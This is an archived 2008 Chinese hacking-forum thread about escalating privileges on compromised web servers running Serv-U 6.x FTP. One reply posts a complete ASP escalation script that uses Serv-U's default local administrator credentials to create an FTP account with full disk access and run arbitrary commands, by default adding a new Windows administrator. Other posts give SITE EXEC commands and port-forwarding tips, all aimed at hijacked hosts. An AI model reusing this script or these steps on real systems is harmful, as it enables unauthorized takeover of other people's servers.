【3.A.S.T】网络安全爱好者's Archiver

黑客学习

2000gaobo 发表于 2008-7-20 23:21

[讨论]关于SU提权中出现的问题

[讨论]关于SU提权中出现的问题
提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华[url=http://forum.eviloctal.com/digest.php?authorid=155566]0[/url] 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=155566]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139155&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139155&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]


[url=http://forum.eviloctal.com/space-uid-67853.html]jxsaqjh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

非法操作 发表于 2008-7-20 23:21

su6.4很多时候是不能直接加用户执行命令的,否则就会让SU结束进程,所以要改下提权工具的源码,把那个连接21的IP改成肉鸡的真实IP就OKjxsaqjh.cn
[url=http://wpa.qq.com/msgrd?V=1&Uin=75320216&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子36 精华[url=http://forum.eviloctal.com/digest.php?authorid=67853]0[/url] 积分99 阅读权限40 性别男 在线时间15 小时 注册时间2006-10-23 最后登录2008-4-9 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67853]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139192&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139192&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]

[url=http://forum.eviloctal.com/space-uid-108943.html]憶楓[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

dk_guang 发表于 2008-7-20 23:21

我手上也有几个SU6.4的站 真不在的SU怎么提权啊 啊 用的是心动吧那个FTP提权 的也没有用  郁闷啊

旧化王 发表于 2008-7-20 23:21

用FTP提权工具先添加个端口
在直接用加用户的工具先加个有执行权限的用户,
然后再自己QUOTE SITE EXEC"COMMAND",123
[url=http://wpa.qq.com/msgrd?V=1&Uin=415961584&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=93314]0[/url] 积分17 阅读权限40 性别男 在线时间36 小时 注册时间2007-3-19 最后登录2008-6-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=93314]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139214&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139214&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-138072.html]wangwang110[/url] [img]http://forum.eviloctal.com/images/avatars/pw/female3.gif[/img]
晶莹剔透§烈日灼然

sunnygirl 发表于 2008-7-20 23:21

用ser-u6.4提权脚本不就行了吗
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = ffport
timeout=3

loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
    b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>提权完毕,已执行了命令:
<font color=red><%=cmd%></font>


<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>

<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="leaves">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>

  </tr>
  <tr align="center" valign="middle">
    <td width="200">用户名:</td>

    <td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>

  </tr>
  <tr align="center" valign="middle">
    <td>口 令:</td>

    <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>

  </tr>
  <tr align="center" valign="middle">
    <td>端 口:</td>

    <td><input name="port" type="text" id="port" value="43958"></td>

服务器端口:

    <td><input name="ffport" type="text" id="ffport" value="65500"></td>

服务器IP:

    <td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>

  </tr>
  <tr align="center" valign="middle">
    <td>系统路径:</td>

    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>

  </tr>
  <tr align="center" valign="middle">
    <td>命 令:</td>

    <td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>

  </tr>
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交">
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</form></center>


使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>
把上面的代码保存为su.asp上传到网站上,然后根据提示改下ip和端口,如果再提权不行,那就应该就是管理员修改了密码了!说实话本人也没有弄成功过!
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=138072]0[/url] 积分7 阅读权限40 性别男 在线时间3 小时 注册时间2007-9-3 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=138072]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139255&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139255&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]

[url=http://forum.eviloctal.com/space-uid-103889.html]join[/url] [img]http://forum.eviloctal.com/customavatars/103889.jpg[/img]
晶莹剔透§烈日灼然

sunmm 发表于 2008-7-20 23:21

偶也遇到过这种情况,用ser-u6.4提权脚本不成功。
可以将43958端口转发到本地,在本地建个S—U加个管理员
然后在CMD下FTP登陆
执行  QUOTE SITE EXEC"net  user join 123/add"www.hackjoin.cn
[url=http://wpa.qq.com/msgrd?V=1&Uin=383675778&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子15 精华[url=http://forum.eviloctal.com/digest.php?authorid=103889]0[/url] 积分68 阅读权限40 性别男 在线时间57 小时 注册时间2007-4-7 最后登录2008-6-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=103889]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139257&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139257&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]

[url=http://forum.eviloctal.com/space-uid-136260.html]fuckshell[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

p-o-t 发表于 2008-7-20 23:21

有时候“域”也很重要。我前些日子拿到个6.4的。用刚出来的通杀的su提权马没有。改了一下相应管理员修改后的域后才成功的
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=136260]0[/url] 积分12 阅读权限40 在线时间13 小时 注册时间2007-8-21 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=136260]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139261&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139261&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-151525.html]柳柳[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

7月11日 发表于 2008-7-20 23:21

你的问题貌似我也遇见过的,,,。。。实在是让人心碎啊。。。最近我拿到了 通杀serv-u的asp大马  和本地溢出  测试时是通杀的,,,。。但是在用在网站提权的时候貌似没成功  而且那个serv-u还是  6.2的。。郁闷死。。。我直接传asp溢出。。一访问IE就直接关闭。。。晕死。。。。

还有楼上的 端口转发要是webshell的cmd权限一点没有。。怎么转发呢???

幽月说他的serv-u是通杀的  结果还是不行 不知道为什么 。。。郁闷中呢。。。。。
[url=http://wpa.qq.com/msgrd?V=1&Uin=506245768&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子7 精华[url=http://forum.eviloctal.com/digest.php?authorid=151525]0[/url] 积分22 阅读权限40 性别男 在线时间19 小时 注册时间2007-12-6 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151525]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32329&repquote=139278&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32329&pid=139278&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-154576.html]asasok[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.